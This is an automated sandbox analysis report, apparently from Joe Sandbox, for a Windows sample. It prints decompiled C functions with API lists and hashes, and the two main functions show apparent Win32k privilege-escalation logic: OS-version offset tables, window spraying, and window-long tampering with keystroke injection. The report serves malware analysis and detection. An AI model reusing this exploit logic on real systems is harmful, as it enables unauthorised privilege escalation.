                      • Opcode ID: 841cb4a85cc25efddd8770beb54d5710f1898451aaf06aae9f54201279f0f772
                      • Instruction ID: 0fbfeba90e6cfc36847d3dc6d869771b139c7288f691d78b84bca329379417c6
                      • Opcode Fuzzy Hash: 841cb4a85cc25efddd8770beb54d5710f1898451aaf06aae9f54201279f0f772
                      • Instruction Fuzzy Hash: C1B0923505C208EBCB442B91EC09B587F69FB04752F004014F60D490E18BB29410AEA2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00933387 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00933387(_Unknown_base(*)()* _a4) {

				return SetUnhandledExceptionFilter(_a4);
			}



                      0x00933394

                      APIs
                      • SetUnhandledExceptionFilter.KERNEL32(?,?,009318DE,00931893), ref: 0093338D
                      Memory Dump Source
                      • Source File: 00000000.00000002.270957240.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000000.00000002.270954040.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.270971167.000000000093E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271007675.0000000000943000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271021541.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271024856.0000000000959000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271028191.000000000095A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_930000_vy3mvlAaCZ.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionFilterUnhandled
                      • String ID:
                      • API String ID: 3192549508-0
                      • Opcode ID: 78256e181c80ee397ac3ab7be1299af334cada15e57d3c2717b0cedf00fd9f00
                      • Instruction ID: 9ded21fb02d2889484d6226c3249492a25cf18cbd1d0646d446b46ba5fa4eb75
                      • Opcode Fuzzy Hash: 78256e181c80ee397ac3ab7be1299af334cada15e57d3c2717b0cedf00fd9f00
                      • Instruction Fuzzy Hash: 09A0113000820CAB8B002B82EC08A883F2CEA002A0B000020F80C0A0208BA2A820AA80
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00932041 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00932041() {
				void* _t3;

				_t3 = GetProcessHeap();
				 *0x95729c = _t3;
				return 0 | _t3 != 0x00000000;
			}




                      0x00932041
                      0x00932049
                      0x00932055

                      APIs
                      • GetProcessHeap.KERNEL32(009314F8,00941E70,00000014), ref: 00932041
                      Memory Dump Source
                      • Source File: 00000000.00000002.270957240.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000000.00000002.270954040.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.270971167.000000000093E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271007675.0000000000943000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271021541.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271024856.0000000000959000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271028191.000000000095A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_930000_vy3mvlAaCZ.jbxd
                      Yara matches
                      Similarity
                      • API ID: HeapProcess
                      • String ID:
                      • API String ID: 54951025-0
                      • Opcode ID: 508a4531c74dc42ba03d18532285f704d89072ec627b2cb5146c985819a16137
                      • Instruction ID: 0d4d9988b07a61e9ca2c9d68fb15cf1c32c86fd6551521a5df41e195fa8a9745
                      • Opcode Fuzzy Hash: 508a4531c74dc42ba03d18532285f704d89072ec627b2cb5146c985819a16137
                      • Instruction Fuzzy Hash: 2EB012F032F20247570C0B3A7C5505936D45708212344403D700FC11A0DF20C8D4FF00
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0093D110 Relevance: 52.9, APIs: 26, Strings: 4, Instructions: 398registryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 151 93d110-93d182 CreateWindowExW 152 93d188-93d198 call 93c750 151->152 153 93d71c 151->153 159 93d715-93d716 DestroyWindow 152->159 160 93d19e-93d1a5 152->160 154 93d71e-93d739 call 93161c 153->154 159->153 161 93d266-93d26b 160->161 162 93d1ab-93d1c3 GetWindowLongW SetWindowLongW 160->162 163 93d271-93d27a DestroyWindow 161->163 164 93d1c5-93d1ce 162->164 163->153 167 93d280-93d287 163->167 165 93d1d4-93d1fc call 9310c5 164->165 166 93d25e-93d264 164->166 173 93d1fe-93d21a 165->173 174 93d22c-93d234 165->174 166->163 167->153 168 93d28d-93d294 167->168 168->153 170 93d29a-93d31b RegisterClassExW 168->170 170->153 172 93d321-93d339 call 935a90 170->172 179 93d340-93d373 CreateWindowExW 172->179 176 93d223-93d22a 173->176 177 93d21c 173->177 174->164 176->163 177->176 180 93d375-93d37c 179->180 181 93d37e-93d386 179->181 180->179 180->181 182 93d390-93d39f 181->182 183 93d3a0-93d3de call 93c750 * 2 182->183 188 93d3e0 183->188 189 93d40a-93d40d 183->189 192 93d3e2-93d3e4 188->192 193 93d3e6-93d402 188->193 190 93d413-93d419 189->190 191 93d4b0-93d4b7 189->191 190->183 196 93d4c2-93d4d1 191->196 197 93d4b9-93d4c0 191->197 192->189 192->193 194 93d404 193->194 195 93d41b-93d4aa call 93c750 * 2 193->195 194->189 198 93d406-93d408 194->198 195->191 196->182 199 93d4d7-93d4d9 196->199 197->196 197->199 198->189 198->195 202 93d4e0-93d4f3 199->202 204 93d500-93d507 202->204 205 93d4f5-93d4fb 202->205 204->202 208 93d509-93d510 204->208 205->204 207 93d4fd-93d4fe DestroyWindow 205->207 207->204 208->153 209 93d516-93d51d 208->209 209->153 210 93d523-93d52a 209->210 211 93d530-93d536 210->211 212 93d70e-93d713 210->212 213 93d540-93d54b 211->213 212->154 213->212 214 93d551-93d576 213->214 215 93d6fb-93d708 214->215 216 93d57c-93d58e CreateThread 214->216 215->212 215->213 217 93d593-93d59a 216->217 218 93d5a6-93d5a9 217->218 219 93d59c-93d5a4 Sleep 217->219 220 93d5af-93d5f0 CreateWindowExW 218->220 221 93d6dd-93d6f5 DestroyWindow * 2 TerminateThread 218->221 219->217 219->218 222 93d5f6-93d682 GetWindowLongW SetWindowLongW call 9310c5 keybd_event * 4 Sleep 220->222 223 93d688-93d6bb DestroyWindow * 2 TerminateThread WaitForSingleObject 220->223 221->215 222->223 223->215 225 93d6bd-93d6cf 223->225 225->215 227 93d6d1-93d6db call 93c820 225->227 227->215
                      C-Code - Quality: 74%
                      			E0093D110(intOrPtr __edx) {
				int _v8;
				signed int _v12;
				char _v20;
				intOrPtr _v28;
				signed int _v32;
				short _v34;
				short _v2032;
				char _v3056;
				intOrPtr _v3060;
				struct HWND__* _v3064;
				intOrPtr _v3068;
				int _v3072;
				intOrPtr _v3076;
				intOrPtr _v3080;
				intOrPtr _v3084;
				struct _WNDCLASSEXW _v3132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t73;
				signed int _t74;
				struct HWND__* _t94;
				signed int _t95;
				void* _t97;
				void* _t99;
				intOrPtr _t100;
				struct HWND__* _t102;
				intOrPtr _t104;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t159;
				intOrPtr _t162;
				intOrPtr _t163;
				void* _t165;
				intOrPtr _t166;
				intOrPtr _t167;
				void* _t169;
				intOrPtr _t176;
				intOrPtr _t179;
				intOrPtr _t181;
				struct HWND__* _t184;
				void* _t185;
				signed int _t188;
				void* _t193;
				int _t194;
				signed int _t195;
				signed int _t196;
				struct _SECURITY_ATTRIBUTES* _t197;
				struct _SECURITY_ATTRIBUTES* _t201;
				signed int _t202;
				void* _t203;
				void* _t223;
				void* _t225;

				_t181 = __edx;
				_push(0xfffffffe);
				_push(0x942148);
				_push(E00932A50);
				_push( *[fs:0x0]);
				_t73 =  *0x943050; // 0xce43520a
				_v12 = _v12 ^ _t73;
				_t74 = _t73 ^ _t202;
				_v32 = _t74;
				_push(_t74);
				 *[fs:0x0] =  &_v20;
				_v28 = _t203 - 0xc28;
				_v3072 = 0;
				_t184 = CreateWindowExW(0, L"#32768", 0, 0, 0, 0, 0, 0, 0, 0,  *0x9580b8, 0);
				_v3064 = _t184;
				if(_t184 == 0) {
					L57:
					L58:
					 *[fs:0x0] = _v20;
					_pop(_t185);
					_pop(_t193);
					_pop(_t165);
					return E0093161C(_t165, _v32 ^ _t202, _t181, _t185, _t193);
				}
				_t166 = E0093C750(_t184);
				_v3068 = _t166;
				if(_t166 == 0) {
					DestroyWindow(_t184);
					goto L57;
				}
				if( *0x9441b0 != 6) {
					_t194 = 1;
					_v3072 = 1;
				} else {
					SetWindowLongW(_t184, 0xfffffff0, GetWindowLongW(_t184, 0xfffffff0) | 0x40000000);
					_t201 = 0;
					while(1) {
						_v3060 = _t201;
						if(_t201 >= 0xa) {
							break;
						}
						_v8 = 0;
						_push(0xdddddddd);
						_push(0xcccccccc);
						_push(0xfffffff4);
						_push(_t184);
						_t159 =  *0x9441ec; // 0x1471
						_push(_t159 - _t201);
						L009310C5();
						if( *((intOrPtr*)(_t166 + 0xc0)) == 0) {
							_v8 = 0xfffffffe;
							_t201 =  &(_t201->nLength);
							continue;
						}
						_t162 =  *0x9441ec; // 0x1471
						_t163 = _t162 - _t201;
						 *0x9441ec = _t163;
						_t194 = 1;
						_v3072 = 1;
						if(_t163 == 0x1471) {
							 *0x958070 =  *0x958070 - 8;
						}
						_v8 = 0xfffffffe;
						L12:
						DestroyWindow(_t184);
						if(_t194 == 0 ||  *0x958060 == 0 ||  *0x958064 == 0) {
							goto L57;
						} else {
							memset( &_v2032, 0x610061, 0x64 << 2);
							_v34 = 0;
							_v3132.cbSize = 0x30;
							_v3132.style = 0;
							_v3132.lpfnWndProc = DefWindowProcW;
							_v3132.cbClsExtra = 0;
							_v3132.cbWndExtra = 0;
							_v3132.hInstance =  *0x9580b8;
							asm("xorps xmm0, xmm0");
							asm("movdqu [ebp-0xc20], xmm0");
							_v3132.lpszClassName = L"MyExtraWnd";
							_v3132.hIconSm = 0;
							if(RegisterClassExW( &_v3132) == 0) {
								goto L57;
							}
							E00935A90( &_v3056, 0, 0x400);
							_t188 = 0;
							while(1) {
								_t94 = CreateWindowExW(0, L"MyExtraWnd",  &_v2032, 0, 0, 0, 0, 0, 0, 0,  *0x9580b8, 0);
								 *(_t202 + _t188 * 4 - 0xbec) = _t94;
								if(_t94 == 0) {
									break;
								}
								_t188 = _t188 + 1;
								if(_t188 < 0x100) {
									continue;
								}
								break;
							}
							_t95 = 0;
							_v3064 = 0;
							do {
								_t195 = 0;
								_t96 =  *((intOrPtr*)(_t202 + _t95 * 4 - 0xbec));
								_v3060 =  *((intOrPtr*)(_t202 + _t95 * 4 - 0xbec));
								while(1) {
									_t97 = E0093C750(_t96);
									_t167 =  *((intOrPtr*)(_t97 + 0x20));
									_v3084 = _t167;
									_v3076 =  *((intOrPtr*)(_t97 + 0x24));
									_t99 = E0093C750( *((intOrPtr*)(_t202 + _t195 * 4 - 0xbec)));
									_t176 =  *((intOrPtr*)(_t99 + 0x20));
									_v3080 = _t176;
									_t181 =  *((intOrPtr*)(_t99 + 0x24));
									_v3068 = _t181;
									_t100 = _v3076;
									_t223 = _t100 - _t181;
									if(_t223 > 0 || _t223 >= 0 && _t167 >= _t176) {
										goto L27;
									}
									L24:
									_t181 = _t176 + 0x300;
									asm("adc ecx, 0x0");
									_t169 = _t167 + 0x40000;
									asm("adc eax, 0x0");
									_t225 = _t100 - _v3068;
									if(_t225 > 0 || _t225 >= 0 && _t169 > _t181) {
										 *0x958080 = _v3060;
										 *0x958090 =  *((intOrPtr*)(_t202 + _t195 * 4 - 0xbec));
										 *0x958084 = E0093C750(_v3060);
										 *0x958094 = E0093C750( *((intOrPtr*)(_t202 + _t195 * 4 - 0xbec)));
										 *0x958088 = _v3084;
										 *0x95808c = _v3076;
										 *0x958098 = _v3080;
										 *0x95809c = _v3068;
										_t179 =  *0x958084;
										 *0x9580a8 =  *((intOrPtr*)(_t179 + 0x10));
										 *0x9580ac =  *((intOrPtr*)(_t179 + 0x14));
										asm("adc ecx, 0x0");
										asm("adc ecx, 0xffffffff");
										 *0x9580a0 =  *0x958088 +  *0x958060 + 0xfffffff8;
										 *0x9580a4 =  *0x95808c;
										L30:
										if( *0x958080 == 0 ||  *0x958090 == 0) {
											break;
										} else {
											goto L33;
										}
									}
									L27:
									_t195 = _t195 + 1;
									if(_t195 > _t188) {
										goto L30;
									}
									_t96 = _v3060;
									_t97 = E0093C750(_t96);
									_t167 =  *((intOrPtr*)(_t97 + 0x20));
									_v3084 = _t167;
									_v3076 =  *((intOrPtr*)(_t97 + 0x24));
									_t99 = E0093C750( *((intOrPtr*)(_t202 + _t195 * 4 - 0xbec)));
									_t176 =  *((intOrPtr*)(_t99 + 0x20));
									_v3080 = _t176;
									_t181 =  *((intOrPtr*)(_t99 + 0x24));
									_v3068 = _t181;
									_t100 = _v3076;
									_t223 = _t100 - _t181;
									if(_t223 > 0 || _t223 >= 0 && _t167 >= _t176) {
										goto L27;
									}
								}
								_t95 =  &(_v3064->i);
								_v3064 = _t95;
							} while (_t95 <= _t188);
							L33:
							_t196 = 0;
							do {
								_t102 =  *(_t202 + _t196 * 4 - 0xbec);
								if(_t102 !=  *0x958080 && _t102 !=  *0x958090) {
									DestroyWindow(_t102);
								}
								_t196 = _t196 + 1;
							} while (_t196 < 0x100);
							if( *0x958080 == 0 ||  *0x958090 == 0) {
								goto L57;
							} else {
								if( *0x95807c != 0) {
									L55:
									goto L58;
								}
								while(1) {
									_t104 =  *0x944244; // 0xa
									if( *0x9580bc >= _t104) {
										goto L55;
									}
									 *0x9580d4 = 0;
									 *0x9580d8 = 0;
									 *0x9580d0 = 0;
									if( *0x95807c != 0) {
										L54:
										 *0x9580bc =  *0x9580bc + 1;
										if( *0x95807c == 0) {
											continue;
										}
										goto L55;
									}
									_t197 = 0;
									 *0x9580c0 = CreateThread(0, 0, E0093C970, 0, 0, 0);
									while( *0x9580d0 == 0) {
										_t197 =  &(_t197->nLength);
										Sleep(0x32);
										if(_t197 < 0x14) {
											continue;
										}
										break;
									}
									if(_t197 >= 0x14) {
										DestroyWindow( *0x9580d4);
										DestroyWindow( *0x9580d8);
										TerminateThread( *0x9580c0, 0xffffffff);
									} else {
										_t113 =  *0x94424c; // 0x1388
										_t115 =  *0x944248; // 0x1388
										 *0x9580d8 = CreateWindowExW(0x80000, L"MyMainWnd", 0, 0x10000000, _t115 + 1, _t113 + 1, 1, 1, 0, 0,  *0x9580b8, 0);
										if( *0x9580d8 != 0) {
											asm("adc edi, 0x0");
											asm("adc edi, 0x0");
											asm("adc edi, 0xffffffff");
											SetWindowLongW( *0x9580d8, 0xfffffff0, GetWindowLongW( *0x9580d8, 0xfffffff0) | 0x40000000);
											_push( *0x95808c);
											_push( *0x958088 +  *0x958064 + 3 - 0x28);
											_push(0xfffffff4);
											_push( *0x9580d8);
											_push( *0x9441ec);
											L009310C5();
											keybd_event(0x12, 0, 0, 0);
											keybd_event(0x1b, 0, 0, 0);
											keybd_event(0x1b, 0, 2, 0);
											keybd_event(0x12, 0, 2, 0);
											Sleep(0x64);
										}
										DestroyWindow( *0x9580d4);
										DestroyWindow( *0x9580d8);
										TerminateThread( *0x9580c0, 0xffffffff);
										WaitForSingleObject( *0x9580c0, 0xffffffff);
										if( *0x95807c == 0 &&  *((intOrPtr*)( *0x958084 +  *0x958064)) >= 0x4000000) {
											 *0x95807c = E0093C820();
										}
									}
									goto L54;
								}
								goto L55;
							}
						}
					}
					_t194 = _v3072;
				}
			}
























































                      0x0093d110
                      0x0093d113
                      0x0093d115
                      0x0093d11a
                      0x0093d125
                      0x0093d12c
                      0x0093d131
                      0x0093d134
                      0x0093d136
                      0x0093d13c
                      0x0093d140
                      0x0093d146
                      0x0093d149
                      0x0093d178
                      0x0093d17a
                      0x0093d182
                      0x0093d71c
                      0x0093d71e
                      0x0093d721
                      0x0093d729
                      0x0093d72a
                      0x0093d72b
                      0x0093d739
                      0x0093d739
                      0x0093d18e
                      0x0093d190
                      0x0093d198
                      0x0093d716
                      0x00000000
                      0x0093d716
                      0x0093d1a5
                      0x0093d266
                      0x0093d26b
                      0x0093d1ab
                      0x0093d1bd
                      0x0093d1c3
                      0x0093d1c5
                      0x0093d1c5
                      0x0093d1ce
                      0x00000000
                      0x00000000
                      0x0093d1d4
                      0x0093d1db
                      0x0093d1e0
                      0x0093d1e5
                      0x0093d1e7
                      0x0093d1e8
                      0x0093d1ef
                      0x0093d1f0
                      0x0093d1fc
                      0x0093d22c
                      0x0093d233
                      0x00000000
                      0x0093d233
                      0x0093d1fe
                      0x0093d203
                      0x0093d205
                      0x0093d20a
                      0x0093d20f
                      0x0093d21a
                      0x0093d21c
                      0x0093d21c
                      0x0093d223
                      0x0093d271
                      0x0093d272
                      0x0093d27a
                      0x00000000
                      0x0093d29a
                      0x0093d2aa
                      0x0093d2ae
                      0x0093d2b2
                      0x0093d2bc
                      0x0093d2c7
                      0x0093d2cd
                      0x0093d2d7
                      0x0093d2e6
                      0x0093d2ec
                      0x0093d2ef
                      0x0093d2f7
                      0x0093d301
                      0x0093d31b
                      0x00000000
                      0x00000000
                      0x0093d32f
                      0x0093d337
                      0x0093d340
                      0x0093d364
                      0x0093d36a
                      0x0093d373
                      0x00000000
                      0x00000000
                      0x0093d375
                      0x0093d37c
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0093d37c
                      0x0093d37e
                      0x0093d380
                      0x0093d390
                      0x0093d390
                      0x0093d392
                      0x0093d399
                      0x0093d3a0
                      0x0093d3a1
                      0x0093d3a6
                      0x0093d3a9
                      0x0093d3b2
                      0x0093d3bf
                      0x0093d3c4
                      0x0093d3c7
                      0x0093d3cd
                      0x0093d3d0
                      0x0093d3d6
                      0x0093d3dc
                      0x0093d3de
                      0x00000000
                      0x00000000
                      0x0093d3e6
                      0x0093d3e8
                      0x0093d3f4
                      0x0093d3f7
                      0x0093d3fd
                      0x0093d400
                      0x0093d402
                      0x0093d421
                      0x0093d42d
                      0x0093d439
                      0x0093d444
                      0x0093d44f
                      0x0093d45a
                      0x0093d465
                      0x0093d470
                      0x0093d475
                      0x0093d47e
                      0x0093d486
                      0x0093d49c
                      0x0093d4a2
                      0x0093d4a5
                      0x0093d4aa
                      0x0093d4b0
                      0x0093d4b7
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0093d4b7
                      0x0093d40a
                      0x0093d40a
                      0x0093d40d
                      0x00000000
                      0x00000000
                      0x0093d413
                      0x0093d3a1
                      0x0093d3a6
                      0x0093d3a9
                      0x0093d3b2
                      0x0093d3bf
                      0x0093d3c4
                      0x0093d3c7
                      0x0093d3cd
                      0x0093d3d0
                      0x0093d3d6
                      0x0093d3dc
                      0x0093d3de
                      0x00000000
                      0x00000000
                      0x0093d3de
                      0x0093d4c8
                      0x0093d4c9
                      0x0093d4cf
                      0x0093d4d7
                      0x0093d4d7
                      0x0093d4e0
                      0x0093d4e0
                      0x0093d4f3
                      0x0093d4fe
                      0x0093d4fe
                      0x0093d500
                      0x0093d501
                      0x0093d510
                      0x00000000
                      0x0093d523
                      0x0093d52a
                      0x0093d70e
                      0x00000000
                      0x0093d70e
                      0x0093d540
                      0x0093d540
                      0x0093d54b
                      0x00000000
                      0x00000000
                      0x0093d551
                      0x0093d55b
                      0x0093d565
                      0x0093d576
                      0x0093d6fb
                      0x0093d6fb
                      0x0093d708
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0093d708
                      0x0093d57c
                      0x0093d58e
                      0x0093d593
                      0x0093d59c
                      0x0093d59f
                      0x0093d5a4
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0093d5a4
                      0x0093d5a9
                      0x0093d6e3
                      0x0093d6eb
                      0x0093d6f5
                      0x0093d5af
                      0x0093d5bf
                      0x0093d5c6
                      0x0093d5e4
                      0x0093d5f0
                      0x0093d607
                      0x0093d60d
                      0x0093d616
                      0x0093d635
                      0x0093d63b
                      0x0093d63c
                      0x0093d63d
                      0x0093d644
                      0x0093d645
                      0x0093d64b
                      0x0093d65e
                      0x0093d668
                      0x0093d672
                      0x0093d67c
                      0x0093d680
                      0x0093d682
                      0x0093d68e
                      0x0093d696
                      0x0093d6a0
                      0x0093d6ae
                      0x0093d6bb
                      0x0093d6d6
                      0x0093d6d6
                      0x0093d6bb
                      0x00000000
                      0x0093d5a9
                      0x00000000
                      0x0093d540
                      0x0093d510
                      0x0093d27a
                      0x0093d25e
                      0x0093d25e

                      APIs
                      • CreateWindowExW.USER32 ref: 0093D172
                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0093D1AE
                      • SetWindowLongW.USER32 ref: 0093D1BD
                      • DestroyWindow.USER32(00000000,00000000), ref: 0093D272
                      • RegisterClassExW.USER32 ref: 0093D312
                      • _memset.LIBCMT ref: 0093D32F
                      • CreateWindowExW.USER32 ref: 0093D364
                      • DestroyWindow.USER32(00000000,00000000), ref: 0093D716
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.270957240.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000000.00000002.270954040.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.270971167.000000000093E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271007675.0000000000943000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271021541.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271024856.0000000000959000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271028191.000000000095A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_930000_vy3mvlAaCZ.jbxd
                      Yara matches
                      Similarity
                      • API ID: Window$CreateDestroyLong$ClassRegister_memset
                      • String ID: #32768$0$MyExtraWnd$MyMainWnd
                      • API String ID: 2621406899-1346871510
                      • Opcode ID: 7e1cc614903a9725cb7b0a5894dc345f8bc00f0c58ab4b961b6e978a8719cd3f
                      • Instruction ID: d185ee95e3871d2b77ebf67994149e44b99eaaab824566e184b5c4a336f75f8a
                      • Opcode Fuzzy Hash: 7e1cc614903a9725cb7b0a5894dc345f8bc00f0c58ab4b961b6e978a8719cd3f
                      • Instruction Fuzzy Hash: FBF18CB19293149FEB20DF69EC49FAB7BB8FB09315F100265E519A72E0CB749884DF50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0093CA30 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 193sleepregistrylibraryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 339 93ca30-93ca78 Sleep GetModuleHandleA LoadLibraryA 340 93ca7a-93ca8b call 93161c 339->340 341 93ca8e-93caaf GetVersionExW 339->341 343 93cc21-93cc8d RegisterClassExW 341->343 344 93cab5-93cabc 341->344 343->340 345 93cc93-93ccc5 GetSystemMetrics * 2 CreateThread 343->345 347 93cadf-93cae8 GetModuleHandleA 344->347 348 93cabe-93cac5 344->348 349 93cd21-93cd36 call 93161c 345->349 350 93ccc7-93cccf 345->350 352 93cb56-93cb67 IsWow64Process 347->352 353 93caea-93cafa 347->353 348->347 351 93cac7-93cad5 348->351 354 93ccd1-93ccdc 350->354 355 93ccfa-93cd1f TerminateThread Sleep keybd_event * 2 350->355 351->352 358 93cad7-93cadd 351->358 352->340 357 93cb6d-93cb74 352->357 359 93cb43-93cb46 353->359 360 93cafc-93cafe 353->360 354->355 361 93ccde-93ccea 354->361 355->349 357->340 364 93cb7a-93cbe3 call 93cfd0 call 93cd40 357->364 358->352 359->340 362 93cb4c 359->362 365 93cb00-93cb0a 360->365 366 93cb0c-93cb0f 360->366 361->355 367 93ccec-93ccf8 Sleep 361->367 362->352 364->340 377 93cbe9-93cbeb 364->377 365->352 369 93cb11-93cb1b 366->369 370 93cb1d-93cb20 366->370 367->354 367->355 369->352 371 93cb22-93cb2c 370->371 372 93cb2e-93cb31 370->372 371->352 372->340 374 93cb37-93cb41 372->374 374->352 377->340 378 93cbf1-93cc1c 377->378 378->343
                      C-Code - Quality: 79%
                      			E0093CA30(void* __ebx, signed int __edx, intOrPtr _a4) {
				signed int _v8;
				char _v10;
				struct _OSVERSIONINFOW _v292;
				int _v296;
				struct _WNDCLASSEXW _v344;
				void* __edi;
				void* __esi;
				signed int _t37;
				signed int _t57;
				signed int _t58;
				struct HINSTANCE__* _t61;
				int* _t62;
				signed int _t63;
				signed int _t65;
				signed int _t67;
				signed int _t69;
				intOrPtr _t72;
				signed int _t82;
				void* _t83;
				void* _t84;
				void* _t85;
				intOrPtr _t90;
				signed int _t91;
				void* _t92;
				void* _t93;
				void* _t95;
				signed int _t96;

				_t91 = __edx;
				_t83 = __ebx;
				_t37 =  *0x943050; // 0xce43520a
				_v8 = _t37 ^ _t96;
				_t92 = Sleep;
				_v296 = 0;
				Sleep(0xc8);
				_t93 = GetModuleHandleA;
				 *0x9580b8 = GetModuleHandleA(0);
				if(LoadLibraryA("USER32.dll") != 0) {
					 *0x9580b4 = _a4;
					_v292.dwOSVersionInfoSize = 0x11c;
					if(GetVersionExW( &_v292) == 0) {
						L24:
						asm("xorps xmm0, xmm0");
						_v344.hInstance =  *0x9580b8;
						_v344.cbSize = 0x30;
						_v344.style = 0;
						_v344.lpfnWndProc = E0093D960;
						_v344.cbClsExtra = 0;
						_v344.cbWndExtra = 0;
						asm("movdqu [ebp-0x13c], xmm0");
						_v344.lpszClassName = L"MyMainWnd";
						_v344.hIconSm = 0;
						if(RegisterClassExW( &_v344) == 0) {
							goto L1;
						} else {
							_t94 = GetSystemMetrics;
							_push(_t83);
							 *0x944248 = GetSystemMetrics(0);
							 *0x94424c = GetSystemMetrics(1);
							_t84 = CreateThread(0, 0, E0093D110, 0, 0, 0);
							if(_t84 != 0) {
								_t95 = 0;
								if( *0x95807c == 0) {
									while(1) {
										_t57 =  *0x944244; // 0xa
										if( *0x9580bc >= _t57) {
											goto L30;
										}
										_t58 =  *0x944244; // 0xa
										if(_t95 < _t58 + _t58 * 4 + _t58 + _t58 * 4) {
											Sleep(0x64);
											_t95 = _t95 + 1;
											if( *0x95807c == 0) {
												continue;
											}
										}
										goto L30;
									}
								}
								L30:
								TerminateThread(_t84, 0);
								Sleep(0x64);
								_t94 = keybd_event;
								keybd_event(0x1b, 0, 2, 0);
								keybd_event(0x12, 0, 2, 0);
							}
							_pop(_t85);
							return E0093161C(_t85, _v8 ^ _t96, _t91, _t92, _t94);
						}
					} else {
						if(_v292.dwMajorVersion != 5 || _v292.dwMinorVersion < 1) {
							_t61 = GetModuleHandleA("ntdll.dll");
							if(_t61 == 0) {
								goto L19;
							} else {
								_t90 =  *((intOrPtr*)(_t61 + 0x3c));
								_t91 =  *(_t90 + _t61 + 0x40) & 0x0000ffff;
								_t82 =  *(_t90 + _t61 + 0x42) & 0x0000ffff;
								if(_t91 != 6) {
									if(_t91 != 0xa) {
										goto L1;
									} else {
										 *0x9441b0 = 6;
										goto L19;
									}
								} else {
									if(_t82 != 0) {
										if(_t82 != 1) {
											if(_t82 != 2) {
												if(_t82 != 3) {
													goto L1;
												} else {
													 *0x9441b0 = 5;
													goto L19;
												}
											} else {
												 *0x9441b0 = 4;
												goto L19;
											}
										} else {
											 *0x9441b0 = 3;
											goto L19;
										}
									} else {
										 *0x9441b0 = 2;
										goto L19;
									}
								}
							}
						} else {
							 *0x9441b0 = 0;
							if(_v10 != 1) {
								 *0x9441b0 =  *0x9441b0 + 1;
							}
							L19:
							_t62 =  &_v296;
							__imp__IsWow64Process(0xffffffff, _t62);
							if(_t62 == 0 || _v296 == 0) {
								goto L1;
							} else {
								 *0x958058 = 1;
								_t63 =  *0x9441b0; // 0x8
								 *0x9441ec =  *((intOrPtr*)(0x9441d0 + _t63 * 4));
								_t65 =  *0x9441b0; // 0x8
								 *0x958070 =  *((intOrPtr*)(0x9441f0 + _t65 * 4));
								_t67 =  *0x9441b0; // 0x8
								 *0x958074 =  *((intOrPtr*)(0x94420c + _t67 * 4));
								_t69 =  *0x9441b0; // 0x8
								 *0x958078 =  *((intOrPtr*)(0x944228 + _t69 * 4));
								 *0x958060 = E0093CFD0();
								_t72 = E0093CD40();
								 *0x958064 = _t72;
								if( *0x958060 == 0 || _t72 == 0) {
									goto L1;
								} else {
									 *0x958068 = _t72 + 0xfffffff8;
									asm("sbb eax, eax");
									 *0x95805c = ( ~( *0x958058) & 0x00000018) + 0x2a;
									asm("sbb eax, eax");
									 *0x95806c = ( ~( *0x958058) & 0x00000024) + 0x34;
									goto L24;
								}
							}
						}
					}
				} else {
					L1:
					return E0093161C(_t83, _v8 ^ _t96, _t91, _t92, _t93);
				}
			}






























                      0x0093ca30
                      0x0093ca30
                      0x0093ca39
